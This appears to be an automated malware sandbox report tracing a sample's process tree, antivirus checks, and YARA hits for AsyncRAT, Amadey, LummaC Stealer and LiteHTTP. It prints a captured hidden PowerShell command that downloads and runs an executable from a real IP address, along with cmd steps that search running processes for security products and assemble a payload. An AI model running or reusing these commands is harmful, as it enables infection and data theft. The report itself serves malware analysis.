                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE" Jump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009C0B62
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009C1663
                                Source: QkRFz2sau5.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                Source: 9c1024a1f1.exe, 0000000F.00000002.22451144383.00000000011A8000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: Program Manager
                                Source: QkRFz2sau5.exeBinary or memory string: Shell_TrayWnd
                                Source: skotes.exe, skotes.exe, 0000000E.00000002.23299331273.00000000008CB000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: 0Program Manager
                                Source: 935372fb1f.exe, 00000010.00000002.22378101507.00000000005FA000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: &Program Manager
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00980698 cpuid 0_2_00980698
                                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009BD21C GetLocalTime,0_2_009BD21C
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009BD27A GetUserNameW,0_2_009BD27A
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0099B952 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0099B952
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Yara detected AsyncRAT
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22404770816.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
                                Source: 9c1024a1f1.exe, 0000000F.00000002.22457316104.00000000059A2000.00000004.00000800.00020000.00000000.sdmp, f891ed3167.exe, 00000026.00000002.22708013785.0000000001406000.00000004.00000020.00020000.00000000.sdmp, f8e8a2d2f0.exe, 0000002B.00000002.22746723106.0000000000CF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: 9c1024a1f1.exe, 9c1024a1f1.exe, 0000000F.00000003.22405142275.00000000059D2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000002.22457601342.00000000059D2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22447694707.00000000059D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dows Defender\MsMpeng.exe
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected Amadey
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Yara detected Amadeys stealer DLL
                                Source: Yara matchFile source: 11.2.Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.420000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.skotes.exe.6d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.skotes.exe.6d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.skotes.exe.6d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000002.22145854915.0000000000421000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.22161020026.00000000006D1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.22160376576.00000000006D1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.23298802638.00000000006D1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                Yara detected LiteHTTP Bot
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected LummaC Stealer
                                Source: Yara matchFile source: Process Memory Space: 9c1024a1f1.exe PID: 3092, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f891ed3167.exe PID: 5544, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: f8e8a2d2f0.exe PID: 2920, type: MEMORYSTR
                                Source: Yara matchFile source: 35.2.33c3d7c7bd.exe.a320000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.f891ed3167.exe.400000.0.raw.unpack, type: UNPACKEDPE
